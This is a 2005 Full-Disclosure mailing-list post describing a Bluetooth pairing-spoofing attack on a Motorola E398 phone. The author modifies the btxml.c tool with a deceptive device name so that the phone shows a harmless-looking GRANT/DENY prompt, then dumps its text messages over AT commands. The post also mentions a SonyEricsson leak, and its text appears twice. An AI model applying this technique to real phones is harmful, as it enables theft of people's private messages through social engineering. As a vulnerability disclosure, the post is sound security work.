Tonu Samuel
2005-05-07 07:27:02 UTC
I got Motorola E398 phone and was trying all known bluetooth exploits on it.
None of them worked (which is good of course). But meanwhile I got some ideas
and after some modifications to existing exploits I found a way to fool my
phone. This is not a very brilliant exploit, so I can post full disclosure
here but would be nice if someone can forward it to right people in Motorola.
I was using source code which is available under name btxml.c (easy to find
with Google). This code does three steps to exploit older Nokia 6310:
1. Looks for discoverable phones
2. Connects them with rfcomm channel 17
3. Uses AT commands to fetch all data in phone
I had some changes to do. First, my mobile cannot be set discoverable for more
than 60 seconds. I hardcoded my phones MAC-like address into sourcecode:
#define BDADDR_MOTOROLA (&(bdaddr_t) {{0x51, 0xED, 0x38, 0x28, 0x0A, 0x00}})
memcpy(&info[i].bdaddr,BDADDR_MOTOROLA,6);
Also I found RFCOMM channel must be 1,3 or 7 or it cannot connect.
Now my mobile phone asks question about pairing. This is where is the problem
located. Depending which channel in use question is different but on channel
7 question looks like:
foobar Requests Voice Gateway?
GRANT DENY
"foobar" is a Bluetooth device name set in btxml.c code (so, freely selectable
by attacker) and GRANT/DENY are buttons to choose between.
So I added in function bt_set_name such line:
strcpy(cp.name, "Allow \nto \nconnent \nEMT \nnetwork\n?");
Now mobile phone asks exactly this: "Allow to connect EMT network?
GRANT/DENY". No scrollbars, no more words, nothing. No sign of anything
unusual.
After user presses "DENY" question appears again until user gets bored and
presses "GRANT". After that bluetooth devices phone is paired and "friendly"
attacker stored in Motorola device list and never-ever any questions appear
again when AT commands are used over bluetooth to fetch data.
btxml is not optimized for Motorola, so output is bit poor but this can be
fixed. Main idea is to show that mobile phones still have problems:
pm:/home/tonu/Desktop # ./btmyxml
<?xml version="1.0" encoding="UTF-8"?>
<phone btaddr="00:0A:28:38:ED:51" name="Motorola E398">
<manufacturer>+GMI: "Motorola CE, Copyright 2000"</manufacturer>
<model>+GMM: "GSM900","GSM1800","GSM1900","MODEL=E398"</model>
<revision>+GMR: "R372_G_0E.20.38R"</revision>
<msgstorage name="IM">
<message>"REC READ", "+372xxxxxxxx", "2005/5/6,16:54:26" Utle,
kui sinuga raakida saab</message>
</msgstorage>
<msgstorage name="OM">
</msgstorage>
<msgstorage name="BM">
</msgstorage>
<msgstorage name="MT">
<message>"REC READ", "+372xxxxxxx", "2005/5/6,16:54:26" Utle,
kui sinuga raakida saab</message>
<message>"REC READ", "+372xxxxxxx", "2005/5/6,21:1:54"
Kalli-kalli :)</message>
</msgstorage>
<msgstorage name="DM">
</msgstorage>
</phone>
BTW, Similar problems are in SonyEricsson. My friend's phone dumped out all
memory content without any questions after mobile phone was made
"discoverable". So if you sit in airport with SonyEricsson and want to make
phone visible for your own laptop, someone else can just make anything with
your phone. Questions are asked when connections made over OBEX but not for
AT commands.
Tõnu
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
None of them worked (which is good of course). But meanwhile I got some ideas
and after some modifications to existing exploits I found a way to fool my
phone. This is not a very brilliant exploit, so I can post full disclosure
here but would be nice if someone can forward it to right people in Motorola.
I was using source code which is available under name btxml.c (easy to find
with Google). This code does three steps to exploit older Nokia 6310:
1. Looks for discoverable phones
2. Connects them with rfcomm channel 17
3. Uses AT commands to fetch all data in phone
I had some changes to do. First, my mobile cannot be set discoverable for more
than 60 seconds. I hardcoded my phones MAC-like address into sourcecode:
#define BDADDR_MOTOROLA (&(bdaddr_t) {{0x51, 0xED, 0x38, 0x28, 0x0A, 0x00}})
memcpy(&info[i].bdaddr,BDADDR_MOTOROLA,6);
Also I found RFCOMM channel must be 1,3 or 7 or it cannot connect.
Now my mobile phone asks question about pairing. This is where is the problem
located. Depending which channel in use question is different but on channel
7 question looks like:
foobar Requests Voice Gateway?
GRANT DENY
"foobar" is a Bluetooth device name set in btxml.c code (so, freely selectable
by attacker) and GRANT/DENY are buttons to choose between.
So I added in function bt_set_name such line:
strcpy(cp.name, "Allow \nto \nconnent \nEMT \nnetwork\n?");
Now mobile phone asks exactly this: "Allow to connect EMT network?
GRANT/DENY". No scrollbars, no more words, nothing. No sign of anything
unusual.
After user presses "DENY" question appears again until user gets bored and
presses "GRANT". After that bluetooth devices phone is paired and "friendly"
attacker stored in Motorola device list and never-ever any questions appear
again when AT commands are used over bluetooth to fetch data.
btxml is not optimized for Motorola, so output is bit poor but this can be
fixed. Main idea is to show that mobile phones still have problems:
pm:/home/tonu/Desktop # ./btmyxml
<?xml version="1.0" encoding="UTF-8"?>
<phone btaddr="00:0A:28:38:ED:51" name="Motorola E398">
<manufacturer>+GMI: "Motorola CE, Copyright 2000"</manufacturer>
<model>+GMM: "GSM900","GSM1800","GSM1900","MODEL=E398"</model>
<revision>+GMR: "R372_G_0E.20.38R"</revision>
<msgstorage name="IM">
<message>"REC READ", "+372xxxxxxxx", "2005/5/6,16:54:26" Utle,
kui sinuga raakida saab</message>
</msgstorage>
<msgstorage name="OM">
</msgstorage>
<msgstorage name="BM">
</msgstorage>
<msgstorage name="MT">
<message>"REC READ", "+372xxxxxxx", "2005/5/6,16:54:26" Utle,
kui sinuga raakida saab</message>
<message>"REC READ", "+372xxxxxxx", "2005/5/6,21:1:54"
Kalli-kalli :)</message>
</msgstorage>
<msgstorage name="DM">
</msgstorage>
</phone>
BTW, Similar problems are in SonyEricsson. My friend's phone dumped out all
memory content without any questions after mobile phone was made
"discoverable". So if you sit in airport with SonyEricsson and want to make
phone visible for your own laptop, someone else can just make anything with
your phone. Questions are asked when connections made over OBEX but not for
AT commands.
Tõnu
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/